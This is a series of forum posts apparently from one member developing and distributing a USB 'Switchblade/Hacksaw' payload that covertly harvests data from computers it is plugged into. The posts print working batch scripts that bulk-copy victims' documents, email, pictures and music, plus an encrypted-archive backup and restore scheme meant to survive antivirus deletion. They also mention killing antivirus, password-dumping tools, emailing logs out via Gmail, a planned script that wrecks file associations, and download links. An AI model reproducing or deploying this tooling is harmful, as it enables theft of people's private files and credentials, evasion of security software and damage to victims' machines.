Leapo

Active Members
  • Posts

    194
Everything posted by Leapo

  1. I'm willing to bet there's a way to do it without resorting to such software...Anybody know exactly what registry keys are created by Photoshop CS when it's installed? I might have an idea as to how to get it to run off of a portable flash drive with a little batch-fu.
  2. It wasn't included with the release of 0.4, but I'm half finished reworking fc_slurp.bat and fc_slurp2.bat...for the third time. I should have thought of using rar.exe to do slurping in the first place, smaller files, and it preserved directory structure within the archive (unlike fc.exe). These new versions of slurp should be in the next release. Once again, thank you for your help with the mirrors, by the time I finished uploading to MegaUpload you had already posted! :P I've updated my original posts to reflect the version change, and put your new mirrors up in the download post. Oh, and for anybody wondering why I'm still calling this beta, it's because there's still broken code that's been disabled. As soon as everything in the broken code section (my 3rd original post) has been fixed, I'll probably jump straight to version 1.0 and remove the beta tag. As soon as I've finished up the new rar slurp method, I'm going to sit down with those two modules for a while and see if I can sort them out. Now, if anybody else would like to pitch in beforehand, I wouldn't mind in the least.
  3. Only problem is, it's $5000 :shock:
  4. Yeah, I'll stick with standard RAR encryption. It has quite a few plusses: - It makes it easier for the end user to update the archive when they make a change (using the included script). - If I wanted to get paranoid, I could change the key every time I release a new version. - Users can set their own custom encryption key with a simple edit of my two batch files, which would completely the signature of the archive. In any case, this is just a temporary solution until I get around to implementing TrueCrypt (which will require many of the same edits as the U3 payload). I figure this is about as good a time as any for a release. Here's version 0.4 of my payload with the fixed up backup and restore scripts. These updated scripts should prevent other data (and the logs folder for that matter) from being constantly backed up and restored. http://rapidshare.com/files/38331130/Pocke...fe_b04.zip.html I'll throw up a few more mirrors and update my first posts in a little while, I just wanted to throw this up now so you guys could give it a shot. I'm really interested to see how different antiviruses will react to the restore function (it's turned on by default in this build). Edit: First post updated with download link, code samples, and semi-complete change log (I'm sure I'm forgetting something, can't remember what...)
  5. Yeah, I just took a look around newegg myself, and that does appear to be the cheapest 4GB U3 flash drive around...is it just me, or are flash drive prices tanking hard? Anyway, I ordered the flash drive, total price came out to $46.81 Now don't think I won't be maintaining my non-U3 payload just because I'll have a U3 flash drive, I'll be maintaining both code bases equally...once I have a U3-only code base to maintain, that is
  6. Yeah, I would probably be putting a lot more effort into a U3 version if I had a U3 drive to use it with myself. :P My 4GB drive is starting to act up (It's starting to lose information, probably due to WAY too many write cycles), so I might be in the market for a replacement flash drive anyway. I remember paying $60 for this non-U3 4GB flash drive, how much do 4GB U3 drives usually run? The payload itself is only a little over 16mb (a little more after the backup is created), so a 32mb flash drive would fit the payload and leave room for a few logs. If you like to do file slurping, though, a 4GB (or larger) drive is kinda a requirement, considering all the crap people tend to throw on their desktops and in their My Documents folders. Edit: I'm working on that new backup script now, but I need to know exactly what files set off various Antivirus solutions so I can back up the minimum amount of files. I don't want to back up more than I need to, because doing so makes the archive larger and increases the time needed to restore the backup. I'm using Avast, and it only picks up the following: - csrss.exe - mailpv.exe - sbs.exe
  7. That's the first thing I'm planning on fixing; the next version of my payload will come with an updated version of my backup script that only backs up files that'll trip an antivirus, meaning that both the backup and restore functions will take much less time. Look out for a release soon
  8. Instead of linking directly to modified versions of software, could you perhaps post how you made some of those apps portable? I happen to actually own Photoshop CS, and I would love to be able to put it on my flash drive and take it with me.
  9. I could probably make my payload work completely off of the CD partition if I ran a few global replacements to correct the paths. The main issue is that I would need to buy a U3 drive to test it on... As for customization, I've had an interesting idea for the U3 version of my payload, and I don't think it's ever been done before. Instead of putting the entire switchblade on the CD partition, I'll only put the actual executables themselves (which keeps them safe from deletion), and I'll keep the batch files on the flash partition (for easy editing). This Hybrid payload would be the best of both worlds, antivirus can't nuke the executables, and you can still edit the batch files without re-flashing the CD partition every time. I would, of course, also maintain my non-U3 payload, using either my backup and restore script or TrueCrypt to protect the payload. You know GonZor, maybe Elmer and Setzer are right, maybe we should combine our efforts. We're working towards a common goal here, we both have some innovative ideas...What do you say GonZor? :) Hehe, nice little Hitchhiker's reference ;) Let me know how that's working out for you. The encrypted RAR method is easier to manage by the end user of the payload, but TrueCrypt is more secure. I'm going to include both methods as optional modules (configurable via start.bat) as long as rar turns out to be mildly successful.
  10. I've added my Automated Backup and Restore module, as well as the Switchblade Kill Switch module to the Switchblade Packages page of the Wiki. I'll throw up a link to my payload on the actual USB Switchblade page in a little bit, and maybe make a whole Wiki page dedicated to my payload when I have the time (I can go a lot more in-depth on a wiki page with no character limits).
  11. Haha, I wasn't exactly planning for the stand-alone script to need mass distribution, as it'll be included in the next full payload build. Actually...that one might be a good idea after all. Considering that the version I posted here is a drop-in solution that should work on any switchblade, I think I'll throw up a little information about it on the Wiki.
  12. Ok, I've cleaned up my backup script a little and plugged it into Start.bat so that it runs right after avkill.exe (might as well try killing whatever antivirus you have running). I'm also working on a batch file (nuke.bat) that will do all kinds of nasty things to the target computer, not the least of which will be changing most file associations to TXTFILE (disabled by default for obvious reasons). Both new features will be in the next payload version. I've tested it out, and the restore feature works like a charm, but I have a few concerns about it. First of all, it takes a while to restore the entire flash drive from the backup (although the user can turn it off if they know they won't be needing it). Second, I'm kinda worried about what these repeated write cycles will do to people's thumbdrives, I don't want to kill anybody's flash drive prematurely because of my backup and restore script. I'm also toying around with your idea of re-associating *.vir files as executables, but any time a batch file calls for *.exe, it fails. I'm going to keep working on this...
  13. @ elmer: I'll get right on that. @ setzer: It would involve some major changes to make my payload run entirely from the U3 portion of the flash drive. I have a working proof of concept that might make putting the files on the CD partition unnecessary anyway. It's basically an automated backup and restore function (currently using an encrypted RAR archive just to see if the concept works, I'm planning on using TrueCrypt in the future for extra security). Here's how you set it up: - Set up a clean switchblade that hasn't been nuked by your antivirus yet. - Download this zip file. (http://rapidshare.com/files/37957439/Restore.zip.html) - Drop the "Restore" folder (from the zip file you just downloaded) onto the root of the switchblade. - Open the Restore folder and run "Update_Archive.bat" to make an encrypted backup of everything on the switchblade. Now you're all set, after your antivirus has nuked the switchblade again, here's how you restore the backup so you'll be ready to go again: - Plug the switchblade into a safe computer. - and run "Restore.bat" to restore the backup. - Your switchblade is now restored back to the last time you ran "Update_Archive.bat" Here's the code if you want to take a look at it: Update_Archive.bat: :: Removes old backup if it exists :: del ".Backup.rar" :: Archives and encrypts the contents of the switchblade with a stupidly long password :: .rar.exe a -hp[nowayinhelltheycanbreakkthispassword9876309531681145690] -r ".Backup.rar" ".." Restore.bat: :: Created a backup copy of our backup. This is just in case you didn't plug your switchblade into :: a safe computer before attempting to restore. This should keep your real backup safe while the :: Antivirus nukes the copy :: copy ".Backup.rar" ".Backup_Safe.rar" :: Here we unarchive the copy of the backup we just made :: .rar.exe x -o+ -p[nowayinhelltheycanbreakkthispassword9876309531681145690] ".Backup_Safe.rar" ".."
::And now that it's finished, we delete the backup of the backup. :: del ".Backup_Safe.rar" Keep in mind that this is just a proof of concept! It fools Avast and AVG Antivirus as long as you don't attempt to restore on a system that has its antivirus active, but I can't yet guarantee that this will be completely foolproof. @GonZor: I'm sooo tempted to add that line to my payload. Only problem is, it'll still break batch scripts that look for *.exe because the file extension has been changed to *.vir. I already have a batch file that changes all executable associations (bat, exe, cmd, etc) to text files, but I'm debating as to whether I should include it as an optional module in my payload, considering it completely screws over whatever system you run it on unless you can get to the recovery console to fix it.
  14. That was fast. Let me go edit the download post again. I can't tell you how much I appreciate the help!
  15. No offense taken, I know large portions of my payload are direct rips from the wiki, I'm just trying to make everything play nice together. Once I've crammed everything in, I might go back and start streamlining the inner workings a little (look at how much better fc_slurp.bat and fc_slurp2.bat are compared to their predecessors from version 0.2). Yeah, I was worried about AVs killing the backup archive. I'll give TrueCrypt a shot, copying the archive and then extracting from the copy should keep everything nice and safe (as long as TrueCrypt works). Once again, many thanks for the help Elmer! I'll copy those mirrors over to my post right now. Upload your ISO whenever you get a chance. For now, I'll build an ISO on my end using your code and upload it so U3 users can get in on the action. Truecrypt can work from the command line. I would go about this in a similar fashion to what you have stated. I would put the entire payload onto the encrypted drive and give it an autorun.inf that would run the payload. It would be harder to make the U3 version of this, but something in the wiki talked about using TrueCrypt with the switchblade. Yes, it's actually very simple to do, although the problem is true crypt doesn't always work. Then again, I guess if you don't have permissions to use true crypt the logs generated wouldn't be much use. Once again, it would be a valid idea to copy the volume and never extract from the original volume, AV's can decimate a volume if you can access it. Now there's an idea, the TrueCrypt volume could be located on the CD partition for the U3 compatible version of my payload. This would ensure that the backup doesn't get nuked (on the U3 version anyway), and still allow for easy access to the guts of the payload on the flash portion of the disk. BTW, You also said something about working on your own custom solution for this? What might that entail?
  16. I might have an idea as to how to do it...anybody know of a command-line app that can automatically unzip an encrypted or password protected archive? If I could store a copy of the contents of my payload (or at least the parts that would be suspect for deletion) in an encrypted archive, and have it unzip automatically before every payload run, you would effectively have an unbreakable switchblade. True, this doesn't prevent the apps from being deleted, but it would restore the apps and fix the payload automatically before the next run... WOW, I think I might have something there!! :shock:
  17. There's an issue with copying more than one file type at once? It works fine for me... For example, the code below copies every file inside "C:Documents and settings" completely indiscriminately, and dumps them all into "D:Documents and Settings Backup" (Though the directory structure gets blown away, so everything located in a sub folder gets dumped directly into the Backup folder) fc.exe "C:Documents and Settings*" "D:Documents and Settings Backup*" /I /O
  18. First things first, a new version has been released! Major highlights for this release include completely overhauled versions of Slurp and Slurp2.bat (now renamed fc_slurp and fc_slurp2.bat), a fixed version of Port_Scan.bat (thanks go to Elmer and GonZor for their help), and improvements to my code comments such as typo fixes and additional information. So, version 0.3 is now up the download link is in the usual place (in the 4th post of the thread, along with a change log)... Or if you're all too lazy to scroll up to my original posts, here are the links for Rapidshare and MegaUpload. @ Elmer and GonZor: Thanks for the help with this pesky module, it took a little more tweaking to get Port_Scan.bat to work properly, but I finally managed to get it to play nice with the other modules. It might be a tad unconventional, but at least it works: mkdir ....Documentslogfiles%computername% Echo ************************************ > ....Documentslogfiles%computername%Port_Scan.log 2>&1 echo ************[Port Scan]************* >> ....Documentslogfiles%computername%Port_Scan.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%Port_Scan.log 2>&1 .portqry -local -l ....Documentslogfiles%computername%%computername%_ports.txt>>nul type ....Documentslogfiles%computername%%computername%_ports.txt >> ....Documentslogfiles%computername%Port_Scan.log 2>&1 del /f/q %~d0Documentslogfiles%computername%%computername%_ports.txt @ GonZor: Interesting proposition, merging our payloads, but how would we go about it? At this point, most of my code would need to be overhauled to work with the rest of your payload, but it looks like bringing over the modules I'm missing from your payload would be relatively easy...seems a shame, though, considering how clean your code is compared to mine (though mine doesn't need to be as clean due to the use of Start.bat to manage active modules). 
@ Elmer: You mentioned something about attempting to make my payload U3 compatible; if that works out, and I converted over the modules from GonZor's payload that I don't have, the only thing his current payload would have over mine is that it runs completely off of the CD partition of the U3 drive. If there's a way to keep the non-U3 portion of a flash drive safe from being nuked by Antivirus software, this might just be the way to go.
  19. Would it be at all possible to add a switch to make File Copier preserve directory structure when copying from sub folders? It's nice being able to copy files located in sub folders, but not when they all get dumped into the target folder :-P Thanks!
  20. Thanks for the tip GonZor, I'll give that a shot (I wasn't the original author of that particular chunk of code, so I wasn't exactly sure what was going on there). As for whose payload is 'the one'... you do have the advantage of having your payload on the U3 section of the flash drive, which keeps everything safe from deletion by an antivirus and makes sure it auto-runs without any user-interaction, but there are quite a few trade-offs for doing it that way (yours can't be installed on a USB hard disk and used for mass file slurping for instance). Now it isn't like my payload is completely perfect either, but we're still debugging the darn thing in here :P I've just downloaded your payload, and I see I have a few things you don't, and you have a few things I don't. Considering my payload is already a compilation of over 5 other payloads, would you mind if I added some code from yours into the mix as well? :D
  21. Well, bad news elmer, I'm getting no output from the code you posted. It looks like the batch file isn't finding the executable (PortQry.exe) that's sitting in the folder with it. The "CD" command I had in there before fixed this issue, but it broke other batch files when run in succession... Edit: Getting fc.exe to copy multiple files of multiple types is pretty darn easy compared to xCopy. The example code below will copy everything from the ".TestCopy From" folder to the ".TestCopy To" folder (this includes sub folders and anything located within them) fc.exe ".TestCopy From*" ".TestCopy To*" /i /o So for example, here's what Slurp2.bat (used for copying the entire contents of the My Documents folder and Desktop) looks like using xCopy: :: My Documents files mkdir ....Documentslogfiles%computername%Slurp_DataMyDocuments mkdir ....Documentslogfiles%computername%Slurp_DataMyMusic mkdir ....Documentslogfiles%computername%Slurp_DataMyVideos mkdir ....Documentslogfiles%computername%Slurp_DataMyPictures xcopy "C:Documents and Settings%username%My Documents*.doc" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.docx" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.rtf" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.txt" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.xls" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.csv" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.ppt" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.pptx" 
....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.mdb" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.jpg" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.png" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.bmp" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.gif" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.htm" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.html" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.eml" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.msg" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.zip" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.rar" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.7z" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.psd" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.jpg" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.wma" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h xcopy "C:Documents 
and Settings%username%My Documents*.wav" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.mp3" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.ogg" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.mpg" ....Documentslogfiles%computername%Slurp_DataMyVideos /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.avi" ....Documentslogfiles%computername%Slurp_DataMyVideos /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.wmv" ....Documentslogfiles%computername%Slurp_DataMyVideos /s/c/q/r/h :: Desktop files mkdir ....Documentslogfiles%computername%Slurp_DataDesktop xcopy "C:Documents and Settings%username%Desktop*.doc" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.rtf" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.txt" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.xls" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.csv" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.ppt" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.mdb" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.jpg" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.gif" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.htm" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy 
"C:Documents and Settings%username%Desktop*.eml" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.msg" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h And here's what it looks like using FileCopier (fc.exe): :: My Documents files mkdir ....Documentslogfiles%computername%Slurp_DataMyDocuments fc.exe "C:Documents and Settings%username%My Documents*" "....Documentslogfiles%computername%Slurp_DataMyDocuments*" /i /o :: Desktop files mkdir ....Documentslogfiles%computername%Slurp_DataDesktop fc.exe "C:Documents and Settings%username%Desktop*" "....Documentslogfiles%computername%Slurp_DataDesktop*" /i /o many thanks to Obi-Wahn for making such a helpful application!
  22. @ MakMike: That's strange, considering I use the same method of launching the hacksaw that's employed on U3 distributions of the Hacksaw. I downloaded the original U3 hacksaw (the same one used on the show), copied the thumbdrive portion directly over to my payload, then I pulled the vb script they used to start the switchblade from the CD partition, decoded it, and modified it to work from the WIPCMD folder. In other words, if the original "as-seen-on-tv" hacksaw works, so should my hacksaw, because all that was changed was a path or two. Are you sure you edited send.bat correctly? If you don't enter the information exactly right, it'll just silently fail to send. Also, make sure you're using a Gmail password that contains NO SPACES; passwords with spaces aren't properly supported (everything after the first space is ignored). @ elmer: Thanks for the fix, I'll test it out a little and add it to the payload, along with my new versions of Slurp and Slurp2.bat...after I compare it to my busted code to see what you had to change to fix it XD
  23. Holy cow elmer, thanks! You got those mirrors up darn quick! I'm going to go ahead and add those mirrors to the main download post.
  24. Download link posted, have at it! Any fixes you guys come up with I'll add to the payload, let's see if we can make this "the one". As for how long I've been working on it...well, I've been slowly building it since the original hacksaw came out. (not bad for my 10th through 14th posts ) I'll keep hammering away on my end, I really want to change the slurp.bat and slurp2.bat files over to FileCopy (FC.exe) instead of xCopy to remove the need to make a new xCopy command for every file extension you want to slurp. I'll probably have it all fixed by tonight, but feel free to use the current incarnation of Slurp, it just isn't quite as efficient as the new version will be.